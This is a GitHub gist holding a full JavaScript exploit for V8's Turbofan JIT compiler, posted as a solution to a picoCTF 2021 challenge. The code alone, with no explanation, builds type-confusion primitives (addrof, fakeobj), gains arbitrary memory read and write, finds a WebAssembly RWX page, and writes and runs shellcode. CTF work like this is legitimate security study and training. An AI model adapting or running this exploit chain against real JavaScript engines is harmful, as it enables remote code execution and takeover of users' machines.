Last active
April 9, 2021 03:01
-
-
Save r4j0x00/053cfc63df315239807de5fa6d2f3ca2 to your computer and use it in GitHub Desktop.
Turbofan exploit picoCTF 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var buf = new ArrayBuffer(8); | |
| var f64_buf = new Float64Array(buf); | |
| var u64_buf = new Uint32Array(buf); | |
| function ftoi(val) { | |
| f64_buf[0] = val; | |
| return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
| } | |
| function itof(val) { | |
| u64_buf[0] = Number(val & 0xffffffffn); | |
| u64_buf[1] = Number(val >> 32n); | |
| return f64_buf[0]; | |
| } | |
| function foo(k) { | |
| var l = k.length; | |
| if(l < 3) return; | |
| return k[0]; | |
| } | |
| function bar(k, b) { | |
| var l = k.length; | |
| if(l < 3) return; | |
| k[0] = b; | |
| } | |
| var j = [1, {}, 3]; | |
| foo(j); | |
| for(var i=0;i<30000;++i) | |
| bar(j, {}); | |
| for(var i=0;i<30000;++i) | |
| foo(j); | |
| var z = [1.1, 2.1, 3.1]; | |
| function addrof(obj) { | |
| bar(z, obj); | |
| addr = ftoi(z[0]) & 0xffffffffn; | |
| z[0] = 1.1; | |
| return addr; | |
| } | |
| function fakeobj(addr) { | |
| z[0] = itof(addr); | |
| fake = foo(z); | |
| z[0] = 1.1; | |
| return fake; | |
| } | |
| var arr2 = [itof(0x82439f1n), 1.2, 2.3, 3.4]; | |
| var fake = fakeobj(addrof(arr2)+0x20n); | |
| function arbread(addr) { | |
| if (addr % 2n == 0) { | |
| addr += 1n; | |
| } | |
| arr2[1] = itof((2n << 32n) + addr - 8n); | |
| return (fake[0]); | |
| } | |
| function arbwrite(addr, val) { | |
| if (addr % 2n == 0) { | |
| addr += 1n; | |
| } | |
| arr2[1] = itof((2n << 32n) + addr - 8n); | |
| fake[0] = itof(BigInt(val)); | |
| } | |
| var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]); | |
| var wasm_mod = new WebAssembly.Module(wasm_code); | |
| var wasm_instance = new WebAssembly.Instance(wasm_mod); | |
| var f = wasm_instance.exports.main; | |
| function copy_shellcode(addr, shellcode) { | |
| let buf = new ArrayBuffer(0x100); | |
| let dataview = new DataView(buf); | |
| let buf_addr = addrof(buf); | |
| let backing_store_addr = buf_addr + 0x14n; | |
| arbwrite(backing_store_addr, addr); | |
| for (let i = 0; i < shellcode.length; i++) { | |
| dataview.setUint32(4*i, shellcode[i], true); | |
| } | |
| } | |
| var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); | |
| console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); | |
| var shellcode = [3091753066, 1852400175, 1932472111, 3884533840, 23687784, 607420673, 16843009, 1784084017, 21519880, 2303219430, 1792160230, 84891707]; | |
| copy_shellcode(rwx_page_addr, shellcode); | |
| f(); | |
| console.log(addrof(z)); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment